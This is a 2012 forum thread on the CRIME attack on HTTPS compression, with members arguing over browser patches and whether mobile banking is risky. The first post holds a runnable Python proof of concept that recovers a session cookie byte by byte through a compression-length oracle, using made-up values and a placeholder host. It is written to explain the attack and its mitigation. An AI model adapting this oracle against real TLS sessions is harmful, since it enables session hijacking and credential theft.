
Computer hack allows HTTPS session hijacking

MplsBob

Senior member
The Ars Technica site has an article about a successful hacking of the Hypertext Transfer Protocol Secure (HTTPS).

HTTPS protects us when we want secure Internet communication during online banking, when we use our credit card, etc.

The hack has been named CRIME. CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter. Microsoft's Internet Explorer, Google's Chrome and Mozilla's Firefox browsers are all believed to be immune to the attack.

Question: Are there any steps we can take to reduce our vulnerability to this?
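The mechanism behind CRIME is easy to see in a few lines, so here is an added example (not from the Ars Technica article or from the researchers' own tooling). It uses Python's zlib as a stand-in for TLS/SPDY DEFLATE compression: the attacker controls part of a request (the path), the browser appends a secret cookie, and the length of the compressed output leaks whether a guessed byte extends the secret. The cookie name, the secret value and the hostname bank.example are constructed for the demo; the assumption that the value is lowercase hex of known length is also the demo's, a real attack would keep extending until the oracle stops rewarding guesses.

```python
import zlib

# Constructed demo values: the cookie name, the secret value the attacker wants,
# and the hostname are made up for this example and come from no real site.
COOKIE_NAME = "sessionid"
SECRET_VALUE = "7f3a9c"
ALPHABET = "0123456789abcdef"  # assumption: the attacker knows the id is lowercase hex


def victim_request(attacker_path: str) -> bytes:
    """Plaintext the victim's browser sends when the attacker (for example via
    a page the victim visits) makes it fetch an attacker-chosen path on the
    target site. The path is attacker-controlled; the browser adds the secret
    cookie on its own."""
    return (
        f"GET /{attacker_path} HTTP/1.1\r\n"
        "Host: bank.example\r\n"
        f"Cookie: {COOKIE_NAME}={SECRET_VALUE}\r\n"
        "\r\n"
    ).encode("ascii")


def observed_length(attacker_path: str) -> int:
    """What a network attacker sees: the size of the encrypted record.
    With TLS compression or SPDY the plaintext is DEFLATE-compressed before
    encryption, so the ciphertext length is the compressed length plus a
    constant. zlib's output length stands in for the record size here."""
    return len(zlib.compress(victim_request(attacker_path)))


def recover_secret(known_prefix: str, secret_len: int) -> str:
    """Byte-at-a-time recovery of the cookie value.

    If the guess extends the true secret, the compressor can reuse a longer
    back-reference when it reaches the cookie, so the record is never longer
    than for a wrong guess. DEFLATE output is padded to whole bytes, so a
    saving of a few bits can be hidden by rounding; every guess that ties for
    the minimum is therefore kept as a candidate, and wrong candidates fall
    away at the next position because they can no longer extend the match."""
    candidates = [known_prefix]
    for _ in range(secret_len):
        scored = {}
        for prefix in candidates:
            for c in ALPHABET:
                scored[prefix + c] = observed_length(prefix + c)
        best = min(scored.values())
        candidates = [p for p, n in scored.items() if n == best]
    if len(candidates) != 1:
        raise RuntimeError(f"recovery stayed ambiguous: {candidates}")
    return candidates[0][len(known_prefix):]


if __name__ == "__main__":
    # The cookie name is public; knowing the value's length is a demo
    # assumption (see the lead-in).
    print("recovered cookie value:",
          recover_secret(COOKIE_NAME + "=", len(SECRET_VALUE)))
```

The mitigation the browser and server patches applied amounts to removing the compression step: with `victim_request` sent uncompressed, its length is the same for every guess and `recover_secret` has nothing to work with, which is why the article's advice boils down to making sure neither side negotiates TLS compression or SPDY with compression enabled.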
 
Not sure really, probably not much besides perhaps using Opera for secure sites. I'm pretty sure everyone is working on a fix that will be out ASAP.
 
Is there maybe a typo in there? You state IE, Chrome, and Firefox are thought to be immune, then want to know what can be done to mitigate the risk. So if you're an Opera or Safari user, you'd just switch to one of the supposed immune browsers.
 
Yes, I think it was a typo. I read that all of those browsers are susceptible to this attack, so I guess Opera is not.
 
Quote from - http://arstechnica.com/security/2012/09/crime-hijacks-https-sessions/

"CRIME works only when both the browser and server support TLS compression or SPDY, an open networking protocol used by both Google and Twitter. Microsoft's Internet Explorer, Google's Chrome and Mozilla's Firefox browsers are all believed to be immune to the attack, but at time of writing smartphone browsers and a myriad of other applications that rely on TLS are believed to remain vulnerable."

End of Quote.

As you see, the main problem is smartphone apps.

IMHO, anyone who does banking and other must-be-secure connections from his/her smartphone has to use the same phone to call a psychiatrist ASAP and get a mental exam.

If one does not get it, there is a reason why the government and other agencies use special BlackBerries and not your telco's regular edition phones.



😎
 
You omitted an important part:

Both Chrome and Firefox were susceptible until recently. Google and Mozilla released patches after the weaknesses were privately reported by Juliano Rizzo (@julianor) and Thai Duong, the researchers who devised the CRIME exploits. Internet Explorer was never vulnerable because it never supported SPDY (pronounced "speedy") or the TLS compression scheme known as Deflate.

As you can see, from a security perspective there is no real differentiation between mobile apps and desktop apps. Doing banking and other secure transactions on your phone is just as secure as doing them on a PC.

Blackberries are more secure because they're less functional, just like IE in this case.
 
I am aware of it; security patches are part of our life.

However, what matters is the end result: desktop/laptop browsers can be patched, while mobile stays risky.

Functional or not, it is secondary to the risk taken while using mobiles for banking and CC activities.


😎
 

No, the mobile apps can be patched just as easily as well. I get updates for my mobile apps every day. A mobile computer is still a computer, the distinction you're drawing is unwarranted. Internet banking is equally risky regardless of the platform. Actually, in theory it's less risky because mobile environments are more controlled and thus have less under-vetted code in them.
 